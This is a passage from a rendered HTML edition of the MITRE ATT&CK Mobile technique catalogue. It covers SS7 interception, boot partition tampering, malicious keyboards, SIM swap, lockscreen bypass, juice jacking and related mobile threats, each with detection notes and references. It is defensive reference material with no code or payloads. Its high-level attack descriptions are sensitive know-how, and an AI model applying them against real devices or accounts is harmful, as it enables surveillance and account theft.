<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html">https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/">https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploit_ss7_to_redirect_phone_calls_sms_mob_t1052"><a class="anchor" href="#_exploit_ss7_to_redirect_phone_calls_sms_mob_t1052"></a><a class="link" href="#_exploit_ss7_to_redirect_phone_calls_sms_mob_t1052">Exploit SS7 to Redirect Phone Calls/SMS - MOB-T1052</a></h3>
<div class="paragraph">
<p>An adversary could exploit signaling system vulnerabilities to redirect calls or text messages to a phone number under the attacker&#8217;s control. The adversary could then act as a man-in-the-middle to intercept or manipulate the communication. These issues are discussed in (Citation: Engel-SS7), (Citation: Engel-SS7)-2008, (Citation: 3GPP-Security), (Citation: Positive-SS7), as well as in a report from the Communications, Security, Reliability, and Interoperability Council (CSRIC) (Citation: CSRIC5-WG10-FinalReport).</p>
</div>
<div class="paragraph">
<p>Detection: Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation as described by the CSRIC (Citation: CSRIC5-WG10-FinalReport). The CSRIC also suggests threat information sharing between telecommunications industry members.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1398. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1052">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1052</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html">https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://berlin.ccc.de/" class="bare">https://berlin.ccc.de/</a><sub>tobias/31c3-ss7-locate-track-manipulate.pdf[<a href="https://berlin.ccc.de/" class="bare">https://berlin.ccc.de/</a></sub>tobias/31c3-ss7-locate-track-manipulate.pdf]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.3gpp.org/ftp/tsg%20sa/wg3%20security/%20specs/33900-120.pdf">http://www.3gpp.org/ftp/tsg%20sa/wg3%20security/%20specs/33900-120.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf">https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf">https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_modify_os_kernel_or_boot_partition_mob_t1001"><a class="anchor" href="#_modify_os_kernel_or_boot_partition_mob_t1001"></a><a class="link" href="#_modify_os_kernel_or_boot_partition_mob_t1001">Modify OS Kernel or Boot Partition - MOB-T1001</a></h3>
<div class="paragraph">
<p>If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device kernel or other boot partition components, where the code may evade detection, may persist after device resets, and may not be removable by the device user. In some cases (e.g., the Samsung Knox warranty bit as described under Detection), the attack may be detected but could result in the device being placed in a state that no longer allows certain functionality.</p>
</div>
<div class="paragraph">
<p>Many Android devices provide the ability to unlock the bootloader for development purposes, but doing so introduces the potential ability for others to maliciously update the kernel or other boot partition code.</p>
</div>
<div class="paragraph">
<p>If the bootloader is not unlocked, it may still be possible to exploit device vulnerabilities to update the code.</p>
</div>
<div class="paragraph">
<p>Detection: The Android SafetyNet API&#8217;s remote attestation capability could potentially be used to identify and respond to compromised devices. Samsung KNOX also provides a remote attestation capability on supported Samsung Android devices.</p>
</div>
<div class="paragraph">
<p>Samsung KNOX devices include a non-reversible Knox warranty bit fuse that is triggered "if a non-Knox kernel has been loaded on the device" (Citation: Samsung-KnoxWarrantyBit). If triggered, enterprise Knox container services will no longer be available on the device.</p>
</div>
<div class="paragraph">
<p>As described in the iOS Security Guide (Citation: Apple-iOSSecurityGuide), iOS devices will fail to boot or fail to allow device activation if unauthorized modifications are detected.</p>
</div>
<div class="paragraph">
<p>Many enterprise applications perform their own checks to detect and respond to compromised devices. These checks are not foolproof but can detect common signs of compromise.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1399. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1001">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1001</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.samsungknox.com/en/faq/what-knox-warranty-bit-and-how-it-triggered">https://www2.samsungknox.com/en/faq/what-knox-warranty-bit-and-how-it-triggered</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.apple.com/business/docs/iOS%20Security%20Guide.pdf">https://www.apple.com/business/docs/iOS%20Security%20Guide.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_abuse_accessibility_features_mob_t1056"><a class="anchor" href="#_abuse_accessibility_features_mob_t1056"></a><a class="link" href="#_abuse_accessibility_features_mob_t1056">Abuse Accessibility Features - MOB-T1056</a></h3>
<div class="paragraph">
<p>A malicious app could abuse Android&#8217;s accessibility features to capture sensitive data or perform other malicious actions, as demonstrated in a proof of concept created by Skycure (Citation: Skycure-Accessibility).</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1400. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1056">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1056</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.skycure.com/blog/accessibility-clickjacking/">https://www.skycure.com/blog/accessibility-clickjacking/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_insecure_third_party_libraries_mob_t1028"><a class="anchor" href="#_insecure_third_party_libraries_mob_t1028"></a><a class="link" href="#_insecure_third_party_libraries_mob_t1028">Insecure Third-Party Libraries - MOB-T1028</a></h3>
<div class="paragraph">
<p>Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities.</p>
</div>
<div class="paragraph">
<p>For example, Ryan Welton of NowSecure identified exploitable remote code execution vulnerabilities in a third-party advertisement library (Citation: NowSecure-RemoteCode). Grace et al. identified security issues in mobile advertisement libraries (Citation: Grace-Advertisement).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1401. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1028">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1028</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nowsecure.com/blog/2015/06/15/a-pattern-for-remote-code-execution-using-arbitrary-file-writes-and-multidex-applications/">https://www.nowsecure.com/blog/2015/06/15/a-pattern-for-remote-code-execution-using-arbitrary-file-writes-and-multidex-applications/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_download_new_code_at_runtime_mob_t1010"><a class="anchor" href="#_download_new_code_at_runtime_mob_t1010"></a><a class="link" href="#_download_new_code_at_runtime_mob_t1010">Download New Code at Runtime - MOB-T1010</a></h3>
<div class="paragraph">
<p>An app could download and execute dynamic code (not included in the original application package) after installation to evade static analysis techniques (and potentially dynamic analysis techniques) used for application vetting or application store review (Citation: Poeplau-ExecuteThis).</p>
</div>
<div class="paragraph">
<p>On Android, dynamic code could include native code, Dalvik code, or JavaScript code that uses the Android WebView&#8217;s JavascriptInterface capability (Citation: Bromium-AndroidRCE).</p>
</div>
<div class="paragraph">
<p>On iOS, techniques for executing dynamic code downloaded after application installation include JSPatch (Citation: FireEye-JSPatch). (Citation: Wang) et al. describe a related method of constructing malicious logic at app runtime on iOS (Citation: Wang).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1402. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1010">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1010</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.internetsociety.org/sites/default/files/10%205%200.pdf">https://www.internetsociety.org/sites/default/files/10%205%200.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labs.bromium.com/2014/07/31/remote-code-execution-on-android-devices/">https://labs.bromium.com/2014/07/31/remote-code-execution-on-android-devices/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/01/hot%20or%20not%20the%20bene.html">https://www.fireeye.com/blog/threat-research/2016/01/hot%20or%20not%20the%20bene.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang%20tielei">https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang%20tielei</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploit_ss7_to_track_device_location_mob_t1053"><a class="anchor" href="#_exploit_ss7_to_track_device_location_mob_t1053"></a><a class="link" href="#_exploit_ss7_to_track_device_location_mob_t1053">Exploit SS7 to Track Device Location - MOB-T1053</a></h3>
<div class="paragraph">
<p>An adversary could exploit signaling system vulnerabilities to track the location of mobile devices, for example as described in (Citation: Engel-SS7), (Citation: Engel-SS7)-2008, (Citation: 3GPP-Security) and (Citation: Positive-SS7), as well as in a report from the Communications, Security, Reliability, and Interoperability Council (CSRIC) (Citation: CSRIC5-WG10-FinalReport).</p>
</div>
<div class="paragraph">
<p>Detection: Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation as described by the CSRIC (Citation: CSRIC-WG1-FinalReport). The CSRIC also suggests threat information sharing between telecommunications industry members.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1403. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1053">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1053</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html">https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://berlin.ccc.de/" class="bare">https://berlin.ccc.de/</a><sub>tobias/31c3-ss7-locate-track-manipulate.pdf[<a href="https://berlin.ccc.de/" class="bare">https://berlin.ccc.de/</a></sub>tobias/31c3-ss7-locate-track-manipulate.pdf]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.3gpp.org/ftp/tsg%20sa/wg3%20security/%20specs/33900-120.pdf">http://www.3gpp.org/ftp/tsg%20sa/wg3%20security/%20specs/33900-120.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf">https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf">https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malicious_third_party_keyboard_app_mob_t1020"><a class="anchor" href="#_malicious_third_party_keyboard_app_mob_t1020"></a><a class="link" href="#_malicious_third_party_keyboard_app_mob_t1020">Malicious Third Party Keyboard App - MOB-T1020</a></h3>
<div class="paragraph">
<p>A malicious app can register as a device keyboard and intercept keypresses containing sensitive values such as usernames and passwords. Zeltser (Citation: Zeltser-Keyboard) describes these risks.</p>
</div>
<div class="paragraph">
<p>Both iOS and Android require the user to explicitly authorize use of third party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1404. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1020">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1020</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://zeltser.com/third-party-keyboards-security/">https://zeltser.com/third-party-keyboards-security/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_exploit_os_vulnerability_mob_t1007">Exploit OS Vulnerability - MOB-T1007</a></h3>
<div class="paragraph">
<p>A malicious app can exploit unpatched vulnerabilities in the operating system to obtain escalated privileges.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1405. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1007">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1007</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remotely_install_application_mob_t1046"><a class="anchor" href="#_remotely_install_application_mob_t1046"></a><a class="link" href="#_remotely_install_application_mob_t1046">Remotely Install Application - MOB-T1046</a></h3>
<div class="paragraph">
<p>An adversary with control of a target&#8217;s Google account can use the Google Play Store&#8217;s remote installation capability to install apps onto the Android devices associated with the Google account as described in (Citation: Oberheide-RemoteInstall), (Citation: Konoth). However, only applications that are available for download through the Google Play Store can be remotely installed using this technique.</p>
</div>
<div class="paragraph">
<p>Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted or known insecure or malicious apps on devices.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1406. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1046">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1046</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/">https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.vvdveen.com/publications/BAndroid.pdf">http://www.vvdveen.com/publications/BAndroid.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_modify_cached_executable_code_mob_t1006"><a class="anchor" href="#_modify_cached_executable_code_mob_t1006"></a><a class="link" href="#_modify_cached_executable_code_mob_t1006">Modify cached executable code - MOB-T1006</a></h3>
<div class="paragraph">
<p>ART (the Android Runtime) compiles optimized code on the device itself to improve performance. If an adversary can escalate privileges, he or she may be able to use those privileges to modify the cached code in order to hide malicious behavior. Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition.</p>
</div>
<div class="paragraph">
<p>Sabanal describes the potential use of this technique in (Citation: Sabanal-ART).</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1407. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1006">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1006</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/asia-15/materials/asia-15-Sabanal-Hiding-Behind-ART-wp.pdf">https://www.blackhat.com/docs/asia-15/materials/asia-15-Sabanal-Hiding-Behind-ART-wp.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_application_discovery_mob_t1021"><a class="anchor" href="#_application_discovery_mob_t1021"></a><a class="link" href="#_application_discovery_mob_t1021">Application Discovery - MOB-T1021</a></h3>
<div class="paragraph">
<p>Adversaries may seek to identify all applications installed on the device. One use case for doing so is to identify the presence of endpoint security applications that may increase the adversary&#8217;s risk of detection. Another use case is to identify the presence of applications that the adversary may wish to target.</p>
</div>
<div class="paragraph">
<p>On Android, applications can use methods in the PackageManager class (Citation: Android-PackageManager) to enumerate other apps installed on device, or an entity with shell access can use the pm command line tool.</p>
</div>
<div class="paragraph">
<p>On iOS, apps can use private API calls to obtain a list of other apps installed on the device as described by Kurtz (Citation: Kurtz-MaliciousiOSApps), however use of private API calls will likely prevent the application from being distributed through Apple&#8217;s App Store.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1408. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1021">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1021</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.android.com/reference/android/content/pm/PackageManager.html">https://developer.android.com/reference/android/content/pm/PackageManager.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://andreas-kurtz.de/2014/09/malicious-ios-apps/">https://andreas-kurtz.de/2014/09/malicious-ios-apps/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lockscreen_bypass_mob_t1064"><a class="anchor" href="#_lockscreen_bypass_mob_t1064"></a><a class="link" href="#_lockscreen_bypass_mob_t1064">Lockscreen Bypass - MOB-T1064</a></h3>
<div class="paragraph">
<p>Techniques have periodically been demonstrated that exploit vulnerabilities on Android (Citation: Wired-AndroidBypass), iOS (Citation: Kaspersky-iOSBypass), or other mobile devices to bypass the device lock screen. The vulnerabilities are generally patched by the device/operating system vendor once they become aware of their existence.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1409. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1064">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1064</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/">https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/">https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sim_card_swap_mob_t1054"><a class="anchor" href="#_sim_card_swap_mob_t1054"></a><a class="link" href="#_sim_card_swap_mob_t1054">SIM Card Swap - MOB-T1054</a></h3>
<div class="paragraph">
<p>An adversary could convince the mobile network operator (e.g. through social networking or forged identification) to issue a new SIM card and associate it with an existing phone number and account (Citation: NYGov-Simswap). The adversary could then obtain SMS messages or hijack phone calls intended for someone else (Citation: Betanews-Simswap). One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts (Citation: Guardian-Simswap).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1410. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1054">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1054</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html">https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.dos.ny.gov/consumerprotection/scams/att-sim.html">http://www.dos.ny.gov/consumerprotection/scams/att-sim.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/">http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters">https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_location_tracking_mob_t1033"><a class="anchor" href="#_location_tracking_mob_t1033"></a><a class="link" href="#_location_tracking_mob_t1033">Location Tracking - MOB-T1033</a></h3>
<div class="paragraph">
<p>An adversary could use a malicious or exploited application to surreptitiously track the device&#8217;s physical location through use of standard operating system APIs.</p>
</div>
<div class="paragraph">
<p>Detection: On both Android (6.0 and up) and iOS, the user can view which applications have permission to access device location through the device settings screen, and the user can choose to revoke the permissions.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1411. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1033">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1033</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploit_via_charging_station_or_pc_mob_t1061"><a class="anchor" href="#_exploit_via_charging_station_or_pc_mob_t1061"></a><a class="link" href="#_exploit_via_charging_station_or_pc_mob_t1061">Exploit via Charging Station or PC - MOB-T1061</a></h3>
<div class="paragraph">
<p>If the mobile device is connected (typically via USB) to a charging station or a PC, for example to charge the device&#8217;s battery, then a compromised or malicious charging station or PC could attempt to exploit the mobile device via the connection.</p>
</div>
<div class="paragraph">
<p>Krebs described this technique in (Citation: Krebs-JuiceJacking). Lau et al. (Citation: Lau-Mactans) demonstrated the ability to inject malicious applications into an iOS device via USB. Hay (Citation: IBM-NexusUSB) demonstrated the ability to exploit a Nexus 6 or 6P device over USB and then gain the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1412. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1061">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1061</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html">https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/">http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf">https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf</a></p></td>
</tr>
<tr>
